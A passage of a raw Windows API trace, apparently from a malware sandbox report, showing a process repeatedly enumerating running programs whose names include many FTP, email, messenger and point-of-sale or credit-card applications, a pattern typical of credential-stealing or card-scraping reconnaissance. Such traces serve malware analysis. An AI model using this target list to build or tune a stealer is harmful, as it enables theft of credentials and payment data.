hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0181.430] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0181.432] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0181.434] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0181.435] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0181.437] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0181.439] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0181.440] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0181.442] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0181.443] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0181.445] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0181.447] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0181.448] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0181.450] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0181.451] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0181.453] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0181.454] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0181.456] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0181.457] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0181.459] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0181.460] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0181.462] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0181.463] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0181.465] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0181.467] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0181.468] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0181.469] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0181.471] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0181.472] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0181.474] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0181.475] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0181.477] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0181.478] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0181.480] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0181.481] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0181.482] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0181.484] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0181.485] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0181.487] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0181.488] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0181.489] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0181.491] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0181.492] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0181.494] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0181.495] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0181.496] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0181.498] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.499] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0181.500] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0181.502] CloseHandle (hObject=0x6c4) returned 1 [0181.502] Sleep (dwMilliseconds=0x64) [0181.672] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb60 [0181.685] Process32First (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.686] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0181.688] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0181.689] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.691] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0181.693] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.694] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0181.696] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0181.700] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0181.702] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.704] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.706] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0181.725] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.728] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.730] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.732] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.734] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.736] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.738] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.739] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0181.741] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0181.743] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.745] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0181.747] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.749] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0181.751] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0181.753] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0181.755] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0181.757] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0181.759] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0181.760] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.795] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.797] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0181.799] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0181.801] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.802] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: 